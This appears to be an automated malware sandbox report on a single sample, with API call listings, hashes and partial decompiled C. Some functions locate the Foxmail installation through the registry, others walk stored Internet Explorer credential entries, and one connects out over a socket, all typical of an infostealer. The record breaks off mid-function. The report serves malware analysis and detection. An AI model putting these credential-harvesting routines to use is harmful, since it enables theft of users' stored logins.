                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: bae5c44c3dbe92e57d96a6ca93c6eb0d90f2ead63d4c74c9300c2f00da431a07
                                      • Instruction ID: a89d08e8c76f68c3a04fe8db53f2f50707915a5d881dc39b51e52607c375eb68
                                      • Opcode Fuzzy Hash: bae5c44c3dbe92e57d96a6ca93c6eb0d90f2ead63d4c74c9300c2f00da431a07
                                      • Instruction Fuzzy Hash: 61F0C835620209BBDB2A9FA5D81DB9FBFF8EF04715F40016AFA05A2254CB704A40DB80
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00258A40, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00258A40(void* __ecx) {
				int _v8;
				void* _v12;
				void* _t7;

				if(RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v12) != 0) {
					L3:
					_t7 = 0;
				} else {
					_v8 = 0x104;
					if(RegQueryValueExA(_v12, "Executable", 0, 0, 0x2667a0,  &_v8) != 0) {
						goto L3;
					} else {
						PathRemoveFileSpecA(0x2667a0);
						_t7 = 1;
					}
				}
				return _t7;
			}






                                      0x00258a63
                                      0x00258a97
                                      0x00258a97
                                      0x00258a65
                                      0x00258a68
                                      0x00258a8a
                                      0x00000000
                                      0x00258a8c
                                      0x00258a8d
                                      0x00258a93
                                      0x00258a93
                                      0x00258a8a
                                      0x00258a9b

                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 00258A5B
                                      • RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,002667A0,?), ref: 00258A82
                                      • PathRemoveFileSpecA.SHLWAPI(002667A0), ref: 00258A8D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileOpenPathQueryRemoveSpecValue
                                      • String ID: Executable$software\Aerofox\FoxmailPreview
                                      • API String ID: 3687894118-2371247776
                                      • Opcode ID: ce28d2946c47cb4f575e78145554b2bc9d819bcf23e031e3c7123413b24d107d
                                      • Instruction ID: 1b73fbff028bffb82ea10d2038bdbce7d716636d33292fb3726ecf62681f9386
                                      • Opcode Fuzzy Hash: ce28d2946c47cb4f575e78145554b2bc9d819bcf23e031e3c7123413b24d107d
                                      • Instruction Fuzzy Hash: 6AF08274654209BAEB208B60EC4AFAA7AAC9745B04F104015FA01F2081D6F09A589524
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 012E5621, Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 057e46dc81e991ccb48b19c0a65fe5c99a49b55e037045a7e103addf4282233e
                                      • Instruction ID: 91c65998ac72402b520191e1a32379e7e043bb3767fd96361962abd390d5d8da
                                      • Opcode Fuzzy Hash: 057e46dc81e991ccb48b19c0a65fe5c99a49b55e037045a7e103addf4282233e
                                      • Instruction Fuzzy Hash: 8441E43AA203009FCB25DF7CC884A6EB7F5EF88718F958569D615EB345D731A901CB80
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 012E9317, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 012E9320
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 012E9343
                                        • Part of subcall function 012E6EDF: HeapAlloc.KERNEL32(00000000,?,?,?,012E852B,00001000,?,?,?,?,012E3843), ref: 012E6F11
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 012E9369
                                      • _free.LIBCMT ref: 012E937C
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 012E938B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                      • String ID:
                                      • API String ID: 2278895681-0
                                      • Opcode ID: 30451572ee86a79edf3b38d1d5f1fd546f7afee9be13047e0240b5e1dfa1eb0d
                                      • Instruction ID: c65cd2116a6aa02e44954e58d537e666e9fd42466919838b8f4c971781249007
                                      • Opcode Fuzzy Hash: 30451572ee86a79edf3b38d1d5f1fd546f7afee9be13047e0240b5e1dfa1eb0d
                                      • Instruction Fuzzy Hash: 4B01D8726112167F7B3157BB5C8CC7B6EEDDAC2AA8355021BFB09C2184EA618C4182B0
                                      Uniqueness

                                      Uniqueness Score: 0.55%

                                      Function 012E7901, Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,012E621F,012E47EE), ref: 012E7906
                                      • SetLastError.KERNEL32(00000000,00000004,000000FF,?,?,?,012E621F,012E47EE), ref: 012E792C
                                      • _free.LIBCMT ref: 012E796C
                                      • _free.LIBCMT ref: 012E799F
                                      • SetLastError.KERNEL32(00000000,?,012E621F,012E47EE), ref: 012E79AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: a2a2825040c8506dd08615a6ff3f89213adf2b2cc26c72be4f6ff0732f03f6e5
                                      • Instruction ID: cf02fabc5c07b1a1d9e19a1142a2e14c5897392aeb5bdaeec8a5a1f93788afb8
                                      • Opcode Fuzzy Hash: a2a2825040c8506dd08615a6ff3f89213adf2b2cc26c72be4f6ff0732f03f6e5
                                      • Instruction Fuzzy Hash: 7911C87522020276D62737397C5CD3B76DD9FA9774F950615F72893298FF30880143A0
                                      Uniqueness

                                      Uniqueness Score: 0.32%

                                      Function 012E77B3, Relevance: 7.6, APIs: 5, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,012E379D,?,?,?,012E385A,00000000), ref: 012E77B7
                                      • _free.LIBCMT ref: 012E780E
                                      • _free.LIBCMT ref: 012E7842
                                      • SetLastError.KERNEL32(00000000,00000000), ref: 012E784F
                                      • SetLastError.KERNEL32(00000000,00000004,000000FF,?,?,012E385A,00000000), ref: 012E785B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 982ed22f274de8f19483be98fc9050c3b690782d77d91adb0e311a8a29b80ee4
                                      • Instruction ID: 1d94f32a0e9571a94e6b0b517506668163da8b67e1e1b2e89d56ceccd6f8d5e3
                                      • Opcode Fuzzy Hash: 982ed22f274de8f19483be98fc9050c3b690782d77d91adb0e311a8a29b80ee4
                                      • Instruction Fuzzy Hash: 5211C8352301036AE627B7387C5CE3B3ADE9FB5731FA00226FB24925D8FE20840197A1
                                      Uniqueness

                                      Uniqueness Score: 0.32%

                                      Function 0025D344, Relevance: 7.6, APIs: 5, Instructions: 56networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 0025D361
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0025D372
                                      • gethostbyname.WS2_32(?), ref: 0025D380
                                      • htons.WS2_32(?), ref: 0025D3A6
                                      • connect.WS2_32(00000000,?,00000010), ref: 0025D3B9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startupconnectgethostbynamehtonssocket
                                      • String ID:
                                      • API String ID: 2405761414-0
                                      • Opcode ID: 8261c7f9f858f85fd212caeb96f8f600efdf3cb70a476f207268a0675db9347e
                                      • Instruction ID: 9ee36cf39f2875ae797c8530496a3033d64dcab3cfc4b55ca484d5ce69807a8d
                                      • Opcode Fuzzy Hash: 8261c7f9f858f85fd212caeb96f8f600efdf3cb70a476f207268a0675db9347e
                                      • Instruction Fuzzy Hash: 6E01C471610305ABD2209B64AC4DE77B7ACEF44721F004969FD54C61A1E6B0C96C87A6
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 012E9815, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 012E982D
                                        • Part of subcall function 012E628A: HeapFree.KERNEL32(00000000,00000000), ref: 012E62A0
                                        • Part of subcall function 012E628A: GetLastError.KERNEL32(?,?,012E98A8,?,00000000,?,00000000,?,012E98CF,?,00000007,?,?,012E9CD3,?,?), ref: 012E62B2
                                      • _free.LIBCMT ref: 012E983F
                                      • _free.LIBCMT ref: 012E9851
                                      • _free.LIBCMT ref: 012E9863
                                      • _free.LIBCMT ref: 012E9875
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 5f0b73848811af4d5fb4b4331561da60213cb88918c5a9c3d3b576dd36dfd178
                                      • Instruction ID: f261331043b5734ace45aac826f8d337ebb1f220464812c8bb426942f23ab9a3
                                      • Opcode Fuzzy Hash: 5f0b73848811af4d5fb4b4331561da60213cb88918c5a9c3d3b576dd36dfd178
                                      • Instruction Fuzzy Hash: 96F01232524205EBDA61DA58E5C9C2AB7DDFE14B18FD80817F24DD7558CB30F8C08B64
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0025A64F, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025A64F(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xb4));
				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
				FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				FreeLibrary( *(_t18 + 0xac));
				 *(_t18 + 0xac) = 0;
				FreeLibrary( *(_t18 + 0xb8));
				 *(_t18 + 0xb8) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				return _t15;
			}





                                      0x0025a658
                                      0x0025a660
                                      0x0025a66a
                                      0x0025a670
                                      0x0025a678
                                      0x0025a67e
                                      0x0025a686
                                      0x0025a68c
                                      0x0025a694
                                      0x0025a69a
                                      0x0025a69c
                                      0x0025a6a5

                                      APIs
                                      • FreeLibrary.KERNEL32(?,00000001,?,00000000,00259DD8), ref: 0025A660
                                      • FreeLibrary.KERNEL32(?,?,00000000,00259DD8), ref: 0025A670
                                      • FreeLibrary.KERNEL32(?,?,00000000,00259DD8), ref: 0025A67E
                                      • FreeLibrary.KERNEL32(?,?,00000000,00259DD8), ref: 0025A68C
                                      • FreeLibrary.KERNEL32(?,?,00000000,00259DD8), ref: 0025A69A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 30e84c7d98a5b85df78ec05586fd61fe45005fd421750b7d469e09f50697eeb6
                                      • Instruction ID: d164fdfcbd72855e23fe46740b938a3cefe3078934cba7a02d8b866c0234062e
                                      • Opcode Fuzzy Hash: 30e84c7d98a5b85df78ec05586fd61fe45005fd421750b7d469e09f50697eeb6
                                      • Instruction Fuzzy Hash: DBF01571B00B16BEC7485F358C84B86FE2AFF09260F00422BD12C42221CB712434DFD2
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0025A2CD, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025A2CD(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xb4));
				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
				FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				FreeLibrary( *(_t18 + 0xac));
				 *(_t18 + 0xac) = 0;
				FreeLibrary( *(_t18 + 0xb8));
				 *(_t18 + 0xb8) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				return _t15;
			}





                                      0x0025a2d6
                                      0x0025a2de
                                      0x0025a2e8
                                      0x0025a2ee
                                      0x0025a2f6
                                      0x0025a2fc
                                      0x0025a304
                                      0x0025a30a
                                      0x0025a312
                                      0x0025a318
                                      0x0025a31a
                                      0x0025a323

                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00259885), ref: 0025A2DE
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00259885), ref: 0025A2EE
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00259885), ref: 0025A2FC
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00259885), ref: 0025A30A
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00259885), ref: 0025A318
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 30e84c7d98a5b85df78ec05586fd61fe45005fd421750b7d469e09f50697eeb6
                                      • Instruction ID: d164fdfcbd72855e23fe46740b938a3cefe3078934cba7a02d8b866c0234062e
                                      • Opcode Fuzzy Hash: 30e84c7d98a5b85df78ec05586fd61fe45005fd421750b7d469e09f50697eeb6
                                      • Instruction Fuzzy Hash: DBF01571B00B16BEC7485F358C84B86FE2AFF09260F00422BD12C42221CB712434DFD2
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 00259EA9, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 252COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 61%
                                      			E00259EA9(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v92;
				char _v96;
				char _v100;
				void* _t124;
				void* _t127;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t147;
				void* _t148;
				void* _t159;
				void* _t162;
				void* _t186;
				char _t226;
				intOrPtr _t229;
				char _t234;
				void* _t235;

				_t234 = 0;
				_t186 = __ecx;
				_t226 = 0;
				_v16 = 0;
				_v44 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				_v84 = 0;
				if(E0025A1FF(__ecx) != 0) {
					_push( &_v16);
					_push(0);
					_push(0x266140);
					if( *((intOrPtr*)(__ecx + 0x8c))() == 0) {
						_push( &_v20);
						_push( &_v44);
						_push(0x200);
						_push(_v16);
						if( *((intOrPtr*)(__ecx + 0x94))() == 0) {
							_t240 = _v44;
							if(_v44 != 0) {
								_v80 = 0;
								_v40 = 0;
								_v36 = 0;
								do {
									_t124 = E0025A1CC(_t240);
									_push(0x10);
									_push(0x266130);
									if(_t124 == 0) {
										_push(_t226);
										_v28 = _v20 + _v40;
										_t127 = E00251000();
										_t235 = _t235 + 0xc;
										__eflags = _t127;
										if(__eflags == 0) {
											E00253412( &_v32,  *((intOrPtr*)(_v28 + 0x10)));
											_t133 = E00253075( &_v32, E00253412( &_v64, L"Internet Explorer"));
											E00255A2D(_v64);
											_v64 = _t234;
											__eflags = _t133;
											if(__eflags != 0) {
												asm("movaps xmm0, [0x2649c0]");
												asm("movups [ebp-0x60], xmm0");
												E00253264( &_v100, E00253412( &_v68,  *((intOrPtr*)(_v8 + 0x14)) + 0x20));
												E00255A2D(_v68);
												_v68 = _t234;
												E00253264( &_v96, E00253412( &_v72,  *((intOrPtr*)(_v8 + 0x18)) + 0x20));
												E00255A2D(_v72);
												_v12 = _t234;
												_t147 = _v28;
												_v72 = _t234;
												_t148 =  *((intOrPtr*)(_t186 + 0x98))(_v16, _t147,  *((intOrPtr*)(_t147 + 0x14)),  *((intOrPtr*)(_t147 + 0x18)), _t234, _t234, _t234,  &_v12);
												__eflags = _t148;
												if(_t148 == 0) {
													_v8 = _v12;
													__eflags =  *((intOrPtr*)(_v28 + 0x1c)) + 0x20;
													E00253264( &_v84, E00253412( &_v76,  *((intOrPtr*)(_v28 + 0x1c)) + 0x20));
													E00255A2D(_v76);
													_v76 = _t234;
												}
												_t235 = _t235 - 0x10;
												E00251EB9(_t235,  &_v100);
												E00251EEF(_t186);
												E0025138F( &_v100);
											}
											E00255A2D(_v32);
											_v32 = _t234;
											goto L18;
										}
									} else {
										_t226 = _v36 + _v20;
										_push(_t226);
										_v8 = _t226;
										_t159 = E00251000();
										_t235 = _t235 + 0xc;
										if(_t159 == 0) {
											E00253412( &_v24,  *((intOrPtr*)(_t226 + 0x10)));
											_t162 = E00253075( &_v24, E00253412( &_v48, L"Internet Explorer"));
											E00255A2D(_v48);
											_v48 = _t234;
											if(_t162 != 0) {
												_t229 = _v8;
												asm("movaps xmm0, [0x2649c0]");
												asm("movups [ebp-0x60], xmm0");
												E00253264( &_v100, E00253412( &_v52,  *((intOrPtr*)(_t229 + 0x14)) + 0x20));
												E00255A2D(_v52);
												_v52 = _t234;
												E00253264( &_v96, E00253412( &_v56,  *((intOrPtr*)(_t229 + 0x18)) + 0x20));
												E00255A2D(_v56);
												_v12 = _t234;
												_push( &_v12);
												_push(_t234);
												_push(_t234);
												_push(_t234);
												_push( *((intOrPtr*)(_t229 + 0x18)));
												_v56 = _t234;
												_push( *((intOrPtr*)(_t229 + 0x14)));
												_push(_t229);
												_push(_v16);
												if( *((intOrPtr*)(_t186 + 0x98))() == 0) {
													_v8 = _v12;
													E00253264( &_v92, E00253412( &_v60,  *((intOrPtr*)(_v12 + 0x1c)) + 0x20));
													E00255A2D(_v60);
													_v60 = _t234;
												}
												_t235 = _t235 - 0x10;
												E00251EB9(_t235,  &_v100);
												E00251EEF(_t186);
												E0025138F( &_v100);
											}
											E00255A2D(_v24);
											_v24 = _t234;
											L18:
											_t226 = _v8;
										}
									}
									_v36 = _v36 + 0x38;
									_t129 = _v80 + 1;
									_v40 = _v40 + 0x34;
									_v80 = _t129;
								} while (_t129 < _v44);
								_t234 = _v84;
							}
						}
					}
				}
				if(_v20 != 0) {
